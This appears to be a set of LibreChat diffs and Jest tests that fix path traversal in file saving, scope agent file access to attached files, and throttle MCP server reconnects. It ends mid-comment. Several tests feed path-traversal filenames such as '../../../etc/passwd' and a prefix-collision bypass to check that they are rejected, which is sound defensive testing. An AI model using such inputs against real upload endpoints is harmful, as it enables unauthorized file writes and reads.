id: 'code-file-id',
apiKey: 'test-key',
toolCallId: 'tool-1',
conversationId: 'conv-1',
messageId: 'msg-1',
session_id: 'session-1',
};
describe('processCodeOutput path traversal protection', () => {
beforeEach(() => {
jest.clearAllMocks();
});
test('sanitizeFilename is called with the raw artifact name', async () => {
mockSanitizeFilename.mockReturnValueOnce('output.csv');
await processCodeOutput({ ...baseParams, name: 'output.csv' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('output.csv');
});
test('sanitized name is used in saveBuffer fileName', async () => {
mockSanitizeFilename.mockReturnValueOnce('sanitized-name.txt');
await processCodeOutput({ ...baseParams, name: '../../../tmp/poc.txt' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../tmp/poc.txt');
const call = mockSaveBuffer.mock.calls[0][0];
expect(call.fileName).toBe('mock-uuid__sanitized-name.txt');
});
test('sanitized name is stored as filename in the file record', async () => {
mockSanitizeFilename.mockReturnValueOnce('safe-output.csv');
await processCodeOutput({ ...baseParams, name: 'unsafe/../../output.csv' });
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-output.csv');
});
test('sanitized name is used for image file records', async () => {
const { convertImage } = require('~/server/services/Files/images/convert');
convertImage.mockResolvedValueOnce({
filepath: '/images/user123/mock-uuid.webp',
bytes: 100,
});
mockSanitizeFilename.mockReturnValueOnce('safe-chart.png');
await processCodeOutput({ ...baseParams, name: '../../../chart.png' });
expect(mockSanitizeFilename).toHaveBeenCalledWith('../../../chart.png');
const fileArg = createFile.mock.calls[0][0];
expect(fileArg.filename).toBe('safe-chart.png');
});
});


@@ -3,7 +3,7 @@ const { v4 } = require('uuid');
 const axios = require('axios');
 const { logger } = require('@librechat/data-schemas');
 const { getCodeBaseURL } = require('@librechat/agents');
-const { logAxiosError, getBasePath } = require('@librechat/api');
+const { logAxiosError, getBasePath, sanitizeFilename } = require('@librechat/api');
 const {
   Tools,
   megabyte,
@@ -146,6 +146,13 @@ const processCodeOutput = async ({
     );
   }
+
+  const safeName = sanitizeFilename(name);
+  if (safeName !== name) {
+    logger.warn(
+      `[processCodeOutput] Filename sanitized: "${name}" -> "${safeName}" | conv=${conversationId}`,
+    );
+  }
   if (isImage) {
     const usage = isUpdate ? (claimed.usage ?? 0) + 1 : 1;
     const _file = await convertImage(req, buffer, 'high', `${file_id}${fileExt}`);
@@ -156,7 +163,7 @@
       file_id,
       messageId,
       usage,
-      filename: name,
+      filename: safeName,
       conversationId,
       user: req.user.id,
       type: `image/${appConfig.imageOutputType}`,
@@ -200,7 +207,7 @@
     );
   }
-  const fileName = `${file_id}__${name}`;
+  const fileName = `${file_id}__${safeName}`;
   const filepath = await saveBuffer({
     userId: req.user.id,
     buffer,
@@ -213,7 +220,7 @@
     filepath,
     messageId,
     object: 'file',
-    filename: name,
+    filename: safeName,
     type: mimeType,
     conversationId,
     user: req.user.id,
@@ -229,6 +236,11 @@
     await createFile(file, true);
     return Object.assign(file, { messageId, toolCallId });
   } catch (error) {
+    if (error?.message === 'Path traversal detected in filename') {
+      logger.warn(
+        `[processCodeOutput] Path traversal blocked for file "${name}" | conv=${conversationId}`,
+      );
+    }
     logAxiosError({
       message: 'Error downloading/processing code environment file',
       error,

@ -58,6 +58,7 @@ jest.mock('@librechat/agents', () => ({
jest.mock('@librechat/api', () => ({ jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(), logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''), getBasePath: jest.fn(() => ''),
sanitizeFilename: jest.fn((name) => name),
})); }));
// Mock models // Mock models


@@ -0,0 +1,69 @@
jest.mock('@librechat/api', () => ({ deleteRagFile: jest.fn() }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), error: jest.fn() },
}));
const mockTmpBase = require('fs').mkdtempSync(
require('path').join(require('os').tmpdir(), 'crud-traversal-'),
);
jest.mock('~/config/paths', () => {
const path = require('path');
return {
publicPath: path.join(mockTmpBase, 'public'),
uploads: path.join(mockTmpBase, 'uploads'),
};
});
const fs = require('fs');
const path = require('path');
const { saveLocalBuffer } = require('../crud');
describe('saveLocalBuffer path containment', () => {
beforeAll(() => {
fs.mkdirSync(path.join(mockTmpBase, 'public', 'images'), { recursive: true });
fs.mkdirSync(path.join(mockTmpBase, 'uploads'), { recursive: true });
});
afterAll(() => {
fs.rmSync(mockTmpBase, { recursive: true, force: true });
});
test('rejects filenames with path traversal sequences', async () => {
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../../../etc/passwd',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('rejects prefix-collision traversal (startsWith bypass)', async () => {
fs.mkdirSync(path.join(mockTmpBase, 'uploads', 'user10'), { recursive: true });
await expect(
saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('malicious'),
fileName: '../user10/evil',
basePath: 'uploads',
}),
).rejects.toThrow('Path traversal detected in filename');
});
test('allows normal filenames', async () => {
const result = await saveLocalBuffer({
userId: 'user1',
buffer: Buffer.from('safe content'),
fileName: 'file-id__output.csv',
basePath: 'uploads',
});
expect(result).toBe('/uploads/user1/file-id__output.csv');
const filePath = path.join(mockTmpBase, 'uploads', 'user1', 'file-id__output.csv');
expect(fs.existsSync(filePath)).toBe(true);
fs.unlinkSync(filePath);
});
});


@@ -78,7 +78,13 @@ async function saveLocalBuffer({ userId, buffer, fileName, basePath = 'images' }
     fs.mkdirSync(directoryPath, { recursive: true });
   }
-  fs.writeFileSync(path.join(directoryPath, fileName), buffer);
+  const resolvedDir = path.resolve(directoryPath);
+  const resolvedPath = path.resolve(resolvedDir, fileName);
+  const rel = path.relative(resolvedDir, resolvedPath);
+  if (rel.startsWith('..') || path.isAbsolute(rel) || rel.includes(`..${path.sep}`)) {
+    throw new Error('Path traversal detected in filename');
+  }
+  fs.writeFileSync(resolvedPath, buffer);
   const filePath = path.posix.join('/', basePath, userId, fileName);
@@ -165,9 +171,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
 }
 /**
- * Validates if a given filepath is within a specified subdirectory under a base path. This function constructs
- * the expected base path using the base, subfolder, and user id from the request, and then checks if the
- * provided filepath starts with this constructed base path.
+ * Validates that a filepath is strictly contained within a subdirectory under a base path,
+ * using path.relative to prevent prefix-collision bypasses.
  *
  * @param {ServerRequest} req - The request object from Express. It should contain a `user` property with an `id`.
  * @param {string} base - The base directory path.
@@ -180,7 +185,8 @@ async function getLocalFileURL({ fileName, basePath = 'images' }) {
 const isValidPath = (req, base, subfolder, filepath) => {
   const normalizedBase = path.resolve(base, subfolder, req.user.id);
   const normalizedFilepath = path.resolve(filepath);
-  return normalizedFilepath.startsWith(normalizedBase);
+  const rel = path.relative(normalizedBase, normalizedFilepath);
+  return !rel.startsWith('..') && !path.isAbsolute(rel) && !rel.includes(`..${path.sep}`);
 };
 /**


@@ -1,10 +1,29 @@
 const { logger } = require('@librechat/data-schemas');
-const { PermissionBits, ResourceType } = require('librechat-data-provider');
+const { PermissionBits, ResourceType, isEphemeralAgentId } = require('librechat-data-provider');
 const { checkPermission } = require('~/server/services/PermissionService');
 const { getAgent } = require('~/models/Agent');
 /**
- * Checks if a user has access to multiple files through a shared agent (batch operation)
+ * @param {Object} agent - The agent document (lean)
+ * @returns {Set<string>} All file IDs attached across all resource types
+ */
+function getAttachedFileIds(agent) {
+  const attachedFileIds = new Set();
+  if (agent.tool_resources) {
+    for (const resource of Object.values(agent.tool_resources)) {
+      if (resource?.file_ids && Array.isArray(resource.file_ids)) {
+        for (const fileId of resource.file_ids) {
+          attachedFileIds.add(fileId);
+        }
+      }
+    }
+  }
+  return attachedFileIds;
+}
+
+/**
+ * Checks if a user has access to multiple files through a shared agent (batch operation).
+ * Access is always scoped to files actually attached to the agent's tool_resources.
  * @param {Object} params - Parameters object
  * @param {string} params.userId - The user ID to check access for
  * @param {string} [params.role] - Optional user role to avoid DB query
@@ -16,7 +35,6 @@ const { getAgent } = require('~/models/Agent');
 const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDelete }) => {
   const accessMap = new Map();
-  // Initialize all files as no access
   fileIds.forEach((fileId) => accessMap.set(fileId, false));
   try {
@@ -26,13 +44,17 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
     return accessMap;
   }
-  // Check if user is the author - if so, grant access to all files
+  const attachedFileIds = getAttachedFileIds(agent);
   if (agent.author.toString() === userId.toString()) {
-    fileIds.forEach((fileId) => accessMap.set(fileId, true));
+    fileIds.forEach((fileId) => {
+      if (attachedFileIds.has(fileId)) {
+        accessMap.set(fileId, true);
+      }
+    });
     return accessMap;
   }
-  // Check if user has at least VIEW permission on the agent
   const hasViewPermission = await checkPermission({
     userId,
     role,
@@ -46,7 +68,6 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
   }
   if (isDelete) {
-    // Check if user has EDIT permission (which would indicate collaborative access)
     const hasEditPermission = await checkPermission({
       userId,
       role,
@@ -55,23 +76,11 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
       requiredPermission: PermissionBits.EDIT,
     });
-    // If user only has VIEW permission, they can't access files
-    // Only users with EDIT permission or higher can access agent files
     if (!hasEditPermission) {
       return accessMap;
     }
   }
-  const attachedFileIds = new Set();
-  if (agent.tool_resources) {
-    for (const [_resourceType, resource] of Object.entries(agent.tool_resources)) {
-      if (resource?.file_ids && Array.isArray(resource.file_ids)) {
-        resource.file_ids.forEach((fileId) => attachedFileIds.add(fileId));
-      }
-    }
-  }
-  // Grant access only to files that are attached to this agent
   fileIds.forEach((fileId) => {
     if (attachedFileIds.has(fileId)) {
       accessMap.set(fileId, true);
@@ -95,7 +104,7 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
  * @returns {Promise<Array<MongoFile>>} Filtered array of accessible files
  */
 const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => {
-  if (!userId || !agentId || !files || files.length === 0) {
+  if (!userId || !agentId || !files || files.length === 0 || isEphemeralAgentId(agentId)) {
     return files;
   }


@@ -0,0 +1,409 @@
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/PermissionService', () => ({
checkPermission: jest.fn(),
}));
jest.mock('~/models/Agent', () => ({
getAgent: jest.fn(),
}));
const { logger } = require('@librechat/data-schemas');
const { Constants, PermissionBits, ResourceType } = require('librechat-data-provider');
const { checkPermission } = require('~/server/services/PermissionService');
const { getAgent } = require('~/models/Agent');
const { filterFilesByAgentAccess, hasAccessToFilesViaAgent } = require('./permissions');
const AUTHOR_ID = 'author-user-id';
const USER_ID = 'viewer-user-id';
const AGENT_ID = 'agent_test-abc123';
const AGENT_MONGO_ID = 'mongo-agent-id';
function makeFile(file_id, user) {
return { file_id, user, filename: `${file_id}.txt` };
}
function makeAgent(overrides = {}) {
return {
_id: AGENT_MONGO_ID,
id: AGENT_ID,
author: AUTHOR_ID,
tool_resources: {
file_search: { file_ids: ['attached-1', 'attached-2'] },
execute_code: { file_ids: ['attached-3'] },
},
...overrides,
};
}
beforeEach(() => {
jest.clearAllMocks();
});
describe('filterFilesByAgentAccess', () => {
describe('early returns (no DB calls)', () => {
it('should return files unfiltered for ephemeral agentId', async () => {
const files = [makeFile('f1', 'other-user')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: Constants.EPHEMERAL_AGENT_ID,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files unfiltered for non-agent_ prefixed agentId', async () => {
const files = [makeFile('f1', 'other-user')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: 'custom-memory-id',
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files when userId is missing', async () => {
const files = [makeFile('f1', 'someone')];
const result = await filterFilesByAgentAccess({
files,
userId: undefined,
agentId: AGENT_ID,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return files when agentId is missing', async () => {
const files = [makeFile('f1', 'someone')];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: undefined,
});
expect(result).toBe(files);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return empty array when files is empty', async () => {
const result = await filterFilesByAgentAccess({
files: [],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
expect(getAgent).not.toHaveBeenCalled();
});
it('should return undefined when files is nullish', async () => {
const result = await filterFilesByAgentAccess({
files: null,
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toBeNull();
expect(getAgent).not.toHaveBeenCalled();
});
});
describe('all files owned by userId', () => {
it('should return all files without calling getAgent', async () => {
const files = [makeFile('f1', USER_ID), makeFile('f2', USER_ID)];
const result = await filterFilesByAgentAccess({
files,
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual(files);
expect(getAgent).not.toHaveBeenCalled();
});
});
describe('mixed owned and non-owned files', () => {
const ownedFile = makeFile('owned-1', USER_ID);
const sharedFile = makeFile('attached-1', AUTHOR_ID);
const unattachedFile = makeFile('not-attached', AUTHOR_ID);
it('should return owned + accessible non-owned files when user has VIEW', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile, unattachedFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toHaveLength(2);
expect(result.map((f) => f.file_id)).toContain('owned-1');
expect(result.map((f) => f.file_id)).toContain('attached-1');
expect(result.map((f) => f.file_id)).not.toContain('not-attached');
});
it('should return only owned files when user lacks VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
});
it('should return only owned files when agent is not found', async () => {
getAgent.mockResolvedValue(null);
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
});
it('should return only owned files on DB error (fail-closed)', async () => {
getAgent.mockRejectedValue(new Error('DB connection lost'));
const result = await filterFilesByAgentAccess({
files: [ownedFile, sharedFile],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([ownedFile]);
expect(logger.error).toHaveBeenCalled();
});
});
describe('file with no user field', () => {
it('should treat file as non-owned and run through access check', async () => {
const noUserFile = makeFile('attached-1', undefined);
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [noUserFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(getAgent).toHaveBeenCalled();
expect(result).toEqual([noUserFile]);
});
it('should exclude file with no user field when not attached to agent', async () => {
const noUserFile = makeFile('not-attached', null);
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [noUserFile],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
});
describe('no owned files (all non-owned)', () => {
const file1 = makeFile('attached-1', AUTHOR_ID);
const file2 = makeFile('not-attached', AUTHOR_ID);
it('should return only attached files when user has VIEW', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await filterFilesByAgentAccess({
files: [file1, file2],
userId: USER_ID,
role: 'USER',
agentId: AGENT_ID,
});
expect(result).toEqual([file1]);
});
it('should return empty array when no VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await filterFilesByAgentAccess({
files: [file1, file2],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
it('should return empty array when agent not found', async () => {
getAgent.mockResolvedValue(null);
const result = await filterFilesByAgentAccess({
files: [file1],
userId: USER_ID,
agentId: AGENT_ID,
});
expect(result).toEqual([]);
});
});
});
describe('hasAccessToFilesViaAgent', () => {
describe('agent not found', () => {
it('should return all-false map', async () => {
getAgent.mockResolvedValue(null);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['f1', 'f2'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
expect(result.get('f2')).toBe(false);
});
});
describe('author path', () => {
it('should grant access to attached files for the agent author', async () => {
getAgent.mockResolvedValue(makeAgent());
const result = await hasAccessToFilesViaAgent({
userId: AUTHOR_ID,
fileIds: ['attached-1', 'not-attached'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(true);
expect(result.get('not-attached')).toBe(false);
expect(checkPermission).not.toHaveBeenCalled();
});
});
describe('VIEW permission path', () => {
it('should grant access to attached files for viewer with VIEW permission', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(true);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
role: 'USER',
fileIds: ['attached-1', 'attached-3', 'not-attached'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(true);
expect(result.get('attached-3')).toBe(true);
expect(result.get('not-attached')).toBe(false);
expect(checkPermission).toHaveBeenCalledWith({
userId: USER_ID,
role: 'USER',
resourceType: ResourceType.AGENT,
resourceId: AGENT_MONGO_ID,
requiredPermission: PermissionBits.VIEW,
});
});
it('should deny all when VIEW permission is missing', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValue(false);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
});
expect(result.get('attached-1')).toBe(false);
});
});
describe('delete path (EDIT permission required)', () => {
it('should grant access when both VIEW and EDIT pass', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(true);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
isDelete: true,
});
expect(result.get('attached-1')).toBe(true);
expect(checkPermission).toHaveBeenCalledTimes(2);
expect(checkPermission).toHaveBeenLastCalledWith(
expect.objectContaining({ requiredPermission: PermissionBits.EDIT }),
);
});
it('should deny all when VIEW passes but EDIT fails', async () => {
getAgent.mockResolvedValue(makeAgent());
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(false);
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['attached-1'],
agentId: AGENT_ID,
isDelete: true,
});
expect(result.get('attached-1')).toBe(false);
});
});
describe('error handling', () => {
it('should return all-false map on DB error (fail-closed)', async () => {
getAgent.mockRejectedValue(new Error('connection refused'));
const result = await hasAccessToFilesViaAgent({
userId: USER_ID,
fileIds: ['f1', 'f2'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
expect(result.get('f2')).toBe(false);
expect(logger.error).toHaveBeenCalledWith(
'[hasAccessToFilesViaAgent] Error checking file access:',
expect.any(Error),
);
});
});
describe('agent with no tool_resources', () => {
it('should deny all files even for the author', async () => {
getAgent.mockResolvedValue(makeAgent({ tool_resources: undefined }));
const result = await hasAccessToFilesViaAgent({
userId: AUTHOR_ID,
fileIds: ['f1'],
agentId: AGENT_ID,
});
expect(result.get('f1')).toBe(false);
});
});
});
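The `getAttachedFileIds` helper introduced in the diff above is self-contained enough to run standalone; this sketch shows how it flattens every `tool_resources` bucket into one deduplicated set, which is what lets both the author path and the VIEW-permission path scope access to attached files only:

```javascript
// Copied from the diff above: collect file IDs across all resource types.
function getAttachedFileIds(agent) {
  const attachedFileIds = new Set();
  if (agent.tool_resources) {
    for (const resource of Object.values(agent.tool_resources)) {
      if (resource?.file_ids && Array.isArray(resource.file_ids)) {
        for (const fileId of resource.file_ids) {
          attachedFileIds.add(fileId);
        }
      }
    }
  }
  return attachedFileIds;
}

const ids = getAttachedFileIds({
  tool_resources: {
    file_search: { file_ids: ['a', 'b'] },
    execute_code: { file_ids: ['b', 'c'] }, // 'b' collapses into the set
    ocr: {}, // bucket without file_ids is skipped
  },
});
console.log([...ids]); // ['a', 'b', 'c']
```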


@@ -34,6 +34,55 @@ const { reinitMCPServer } = require('./Tools/mcp');
 const { getAppConfig } = require('./Config');
 const { getLogStores } = require('~/cache');
+
+const MAX_CACHE_SIZE = 1000;
+const lastReconnectAttempts = new Map();
+const RECONNECT_THROTTLE_MS = 10_000;
+const missingToolCache = new Map();
+const MISSING_TOOL_TTL_MS = 10_000;
+
+function evictStale(map, ttl) {
+  if (map.size <= MAX_CACHE_SIZE) {
+    return;
+  }
+  const now = Date.now();
+  for (const [key, timestamp] of map) {
+    if (now - timestamp >= ttl) {
+      map.delete(key);
+    }
+    if (map.size <= MAX_CACHE_SIZE) {
+      return;
+    }
+  }
+}
+
+const unavailableMsg =
+  "This tool's MCP server is temporarily unavailable. Please try again shortly.";
+
+/**
+ * @param {string} toolName
+ * @param {string} serverName
+ */
+function createUnavailableToolStub(toolName, serverName) {
+  const normalizedToolKey = `${toolName}${Constants.mcp_delimiter}${normalizeServerName(serverName)}`;
+  const _call = async () => [unavailableMsg, null];
+  const toolInstance = tool(_call, {
+    schema: {
+      type: 'object',
+      properties: {
+        input: { type: 'string', description: 'Input for the tool' },
+      },
+      required: [],
+    },
+    name: normalizedToolKey,
+    description: unavailableMsg,
+    responseFormat: AgentConstants.CONTENT_AND_ARTIFACT,
+  });
+  toolInstance.mcp = true;
+  toolInstance.mcpRawServerName = serverName;
+  return toolInstance;
+}
+
 function isEmptyObjectSchema(jsonSchema) {
   return (
     jsonSchema != null &&
@@ -211,6 +260,17 @@ async function reconnectServer({
   logger.debug(
     `[MCP][reconnectServer] serverName: ${serverName}, user: ${user?.id}, hasUserMCPAuthMap: ${!!userMCPAuthMap}`,
   );
+  const throttleKey = `${user.id}:${serverName}`;
+  const now = Date.now();
+  const lastAttempt = lastReconnectAttempts.get(throttleKey) ?? 0;
+  if (now - lastAttempt < RECONNECT_THROTTLE_MS) {
+    logger.debug(`[MCP][reconnectServer] Throttled reconnect for ${serverName}`);
+    return null;
+  }
+  lastReconnectAttempts.set(throttleKey, now);
+  evictStale(lastReconnectAttempts, RECONNECT_THROTTLE_MS);
+
   const runId = Constants.USE_PRELIM_RESPONSE_MESSAGE_ID;
   const flowId = `${user.id}:${serverName}:${Date.now()}`;
   const flowManager = getFlowStateManager(getLogStores(CacheKeys.FLOWS));
@@ -267,7 +327,7 @@ async function reconnectServer({
       userMCPAuthMap,
       forceNew: true,
       returnOnOAuth: false,
-      connectionTimeout: Time.TWO_MINUTES,
+      connectionTimeout: Time.THIRTY_SECONDS,
     });
   } finally {
     // Clean up abort handler to prevent memory leaks
@@ -330,9 +390,13 @@ async function createMCPTools({
     userMCPAuthMap,
     streamId,
   });
+  if (result === null) {
+    logger.debug(`[MCP][${serverName}] Reconnect throttled, skipping tool creation.`);
+    return [];
+  }
   if (!result || !result.tools) {
     logger.warn(`[MCP][${serverName}] Failed to reinitialize MCP server.`);
-    return;
+    return [];
   }
   const serverTools = [];
@@ -402,6 +466,14 @@ async function createMCPTool({
   /** @type {LCTool | undefined} */
   let toolDefinition = availableTools?.[toolKey]?.function;
   if (!toolDefinition) {
+    const cachedAt = missingToolCache.get(toolKey);
+    if (cachedAt && Date.now() - cachedAt < MISSING_TOOL_TTL_MS) {
+      logger.debug(
+        `[MCP][${serverName}][${toolName}] Tool in negative cache, returning unavailable stub.`,
+      );
+      return createUnavailableToolStub(toolName, serverName);
+    }
     logger.warn(
       `[MCP][${serverName}][${toolName}] Requested tool not found in available tools, re-initializing MCP server.`,
     );
@@ -415,11 +487,18 @@ async function createMCPTool({
       streamId,
     });
     toolDefinition = result?.availableTools?.[toolKey]?.function;
+    if (!toolDefinition) {
+      missingToolCache.set(toolKey, Date.now());
+      evictStale(missingToolCache, MISSING_TOOL_TTL_MS);
+    }
   }
   if (!toolDefinition) {
-    logger.warn(`[MCP][${serverName}][${toolName}] Tool definition not found, cannot create tool.`);
-    return;
+    logger.warn(
+      `[MCP][${serverName}][${toolName}] Tool definition not found, returning unavailable stub.`,
+    );
+    return createUnavailableToolStub(toolName, serverName);
  }
   return createToolInstance({
@@ -720,4 +799,5 @@ module.exports = {
   getMCPSetupData,
   checkOAuthFlowStatus,
   getServerConnectionStatus,
+  createUnavailableToolStub,
 };
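The `evictStale` helper in the diff above deliberately does nothing until the map exceeds `MAX_CACHE_SIZE`, then deletes expired entries in insertion order and stops as soon as the map is back under the cap, so eviction cost stays bounded. A standalone run (with the cap lowered to 3 purely to make the demo visible; the source uses 1000):

```javascript
const MAX_CACHE_SIZE = 3; // lowered from the source's 1000 for demonstration

// Copied from the diff above, apart from the lowered cap.
function evictStale(map, ttl) {
  if (map.size <= MAX_CACHE_SIZE) {
    return;
  }
  const now = Date.now();
  for (const [key, timestamp] of map) {
    if (now - timestamp >= ttl) {
      map.delete(key);
    }
    if (map.size <= MAX_CACHE_SIZE) {
      return;
    }
  }
}

const cache = new Map();
const past = Date.now() - 60_000; // all entries already older than the TTL
for (const key of ['a', 'b', 'c', 'd', 'e']) {
  cache.set(key, past);
}
evictStale(cache, 10_000);
// Oldest-inserted 'a' and 'b' are evicted; iteration stops at the cap.
console.log(cache.size); // 3
console.log([...cache.keys()]); // ['c', 'd', 'e']
```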


@@ -45,6 +45,7 @@ const {
   getMCPSetupData,
   checkOAuthFlowStatus,
   getServerConnectionStatus,
+  createUnavailableToolStub,
 } = require('./MCP');

 jest.mock('./Config', () => ({
@@ -1098,6 +1099,188 @@ describe('User parameter passing tests', () => {
   });
 });
describe('createUnavailableToolStub', () => {
it('should return a tool whose _call returns a valid CONTENT_AND_ARTIFACT two-tuple', async () => {
const stub = createUnavailableToolStub('myTool', 'myServer');
// invoke() goes through langchain's base tool, which checks responseFormat.
// CONTENT_AND_ARTIFACT requires [content, artifact] — a bare string would throw:
// "Tool response format is "content_and_artifact" but the output was not a two-tuple"
const result = await stub.invoke({});
// If we reach here without throwing, the two-tuple format is correct.
// invoke() returns the content portion of [content, artifact] as a string.
expect(result).toContain('temporarily unavailable');
});
});
describe('negative tool cache and throttle interaction', () => {
it('should cache tool as missing even when throttled (cross-user dedup)', async () => {
const mockUser = { id: 'throttle-test-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: reconnect succeeds but tool not found
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `missing-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// Second call within 10s for DIFFERENT tool on same server:
// reconnect is throttled (returns null), tool is still cached as missing.
// This is intentional: the cache acts as cross-user dedup since the
// throttle is per-user-per-server and can't prevent N different users
// from each triggering their own reconnect.
const result2 = await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `other-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result2).toBeDefined();
expect(result2.name).toContain('other-tool');
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect when user A already cached the tool', async () => {
const userA = { id: 'cache-user-A' };
const userB = { id: 'cache-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests the SAME tool within 10s.
// The negative cache is keyed by toolKey (no user prefix), so user B
// gets a cache hit and no reconnect fires. This is the cross-user
// storm protection: without this, user B's unthrottled first request
// would trigger a second reconnect to the same server.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('shared-tool');
// reinitMCPServer still called only once — user B hit the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect for throttle-cached tools', async () => {
const userA = { id: 'storm-user-A' };
const userB = { id: 'storm-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect for tool-1, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-1${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// User A: tool-2 on same server within 10s → throttled → cached from throttle
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests tool-2 — gets cache hit from the throttle-cached entry.
// Without this caching, user B would trigger a real reconnect since
// user B has their own throttle key and hasn't reconnected yet.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('tool-2');
// Still only 1 real reconnect — user B was protected by the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
});
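The cross-user protection exercised above hinges on the negative cache being keyed by `toolKey` alone, with no user prefix, so a miss recorded for user A also short-circuits user B. A minimal standalone sketch of such a cache (hypothetical names and a 10-second TTL inferred from the tests; the real implementation lives in the MCP tool layer):

```javascript
// Hypothetical sketch of a toolKey-scoped negative cache with a 10s TTL.
// Keying by toolKey alone (no user prefix) means a miss recorded for user A
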